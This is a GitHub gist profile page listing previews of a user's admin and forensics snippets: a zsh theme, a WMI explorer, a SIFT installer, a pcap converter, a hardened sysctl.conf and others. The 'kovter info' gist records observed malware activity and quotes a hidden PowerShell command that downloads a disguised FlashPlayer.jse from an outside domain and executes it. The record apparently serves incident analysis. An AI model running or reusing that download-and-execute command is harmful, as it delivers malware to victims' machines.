Skip to content

Instantly share code, notes, and snippets.

View jermdw's full-sized avatar
😺

jermdw jermdw

😺
33 followers · 147 following
View GitHub Profile
@jermdw
jermdw / jerm.zsh-theme
Created April 10, 2018 04:23
Custom ZSH Prompt / Theme
PROMPT='%{$fg_bold[white]%}%M %{$fg_bold[red]%}✈ %
{$fg_bold[green]%}%p %{$fg[cyan]%}%c %
{$fg_bold[blue]%}$(git_prompt_info)%{$fg_bold[blue]%} % %
{$reset_color%}'
@jermdw
jermdw / wmi_explorer.ps1
Created February 16, 2018 17:00
Powershell WMI Explorer Program
#
# WmiExplorer.ps1
#
# A GUI WMI explorer and WMI Method Help generator
#
# /\/\o\/\/ 2006
# www.ThePowerShellGuy.com
#
# load Forms NameSpace
[void][System.Reflection.Assembly]::LoadWithPartialName("System.windows.forms")
@jermdw
jermdw / autorunsc.md
Created January 31, 2018 16:28
Autorunsc

./autorunsc -a * -c -h -m -s -t -nobanner * >> autorunsc.txt

@jermdw
jermdw / install_sift.sh
Created January 25, 2018 03:41
Install SIFT Workstation Tools
#!/usr/bin/env bash
# Install SIFT Workstation Tools - tested to work on Ubuntu 16.04
# j3rmbadger
# Snag the binaries - https://github.com/sans-dfir/sift-cli
wget https://github.com/sans-dfir/sift-cli/releases/download/v1.5.1/sift-cli-linux
wget https://github.com/sans-dfir/sift-cli/releases/download/v1.5.1/sift-cli-linux.sha256.asc1
# Validate signature file
gpg --keyserver pgp.mit.edu --recv-keys 22598A94
@jermdw
jermdw / imgcat.sh
Created January 24, 2018 15:44
Imgcat - view images in iTerm2
#!/bin/bash
# tmux requires unrecognized OSC sequences to be wrapped with DCS tmux;
# <sequence> ST, and for all ESCs in <sequence> to be replaced with ESC ESC. It
# only accepts ESC backslash for ST.
#
# Don't forget to chmod +x to imgcat.sh (makes script executable)
function print_osc() {
if [[ $TERM == screen* ]] ; then
@jermdw
jermdw / control_ksm.sh
Created January 19, 2018 21:38
Linux KSM Init Script
#!/bin/sh
#
# Author: Marin Atanasov Nikolov <dnaeon@gmail.com>
# http://dnaeon.github.io/enable-ksm-during-boot-time-on-linux/
#
### BEGIN INIT INFO
# Provides: ksm
# Required-Start:
# Required-Stop:
# X-Start-Before:
@jermdw
jermdw / log_tail.md
Created January 15, 2018 01:34
Tail Logs

Tail logs using Journald

sudo journalctl -f -u ssh.service

@jermdw
jermdw / b64_2_pcap.py
Created January 9, 2018 18:30
Convert Base64 encoded packet capture from Suricata IDS into a binary PCAP file for analysis.
#!/usr/bin/env python2
import base64, struct, sys
if len(sys.argv) > 1:
try:
binary = base64.decodestring(sys.argv[1])
#File header
sys.stdout.write(struct.pack("IHHIIII",
0xa1b2c3d4, # Magic
@jermdw
jermdw / kovter.gist
Created January 8, 2018 17:33
kovter info
1.
`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1515369180924.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://choh5franchising.org/255284510275/1515369170878859/FlashPlayer.jse',$d);Invoke-Item $d;`
2.
`Parent Command Line "C:\Windows\System32\WScript.exe" "C:\Users\SVCSTO~1\AppData\Local\Temp\1515369180924.js"`
`Process Command Line:
"C:\Windows\System32\cmd.exe" /v /k "@echo off & color 0A &SET PRG0=[____________________] 0&SET PRG1=[##__________________] 10&SET PRG2=[####________________] 20&SET PRG3=[######______________] 30&SET PRG4=[########____________] 40&SET PRG5=[##########__________] 50&SET PRG6=[############________] 60&SET PRG7=[##############______] 70&SET PRG8=[################____] 80&SET PRG9=[##################__] 90&SET PRG10=[####################] 100&echo Please Wait...&ping -n 2 localhost >nul&(FOR /L %I IN (0,1,10) DO (cls&echo Please Wait...&echo --------------------------------------&echo Progress: !PR
@jermdw
jermdw / sysctl.conf
Created December 21, 2017 00:59
Hardened /etc/sysctl.conf
# Enable syn flood protection
net.ipv4.tcp_syncookies = 1
# Ignore source-routed packets
net.ipv4.conf.all.accept_source_route = 0
# Ignore source-routed packets
net.ipv4.conf.default.accept_source_route = 0
# Ignore ICMP redirects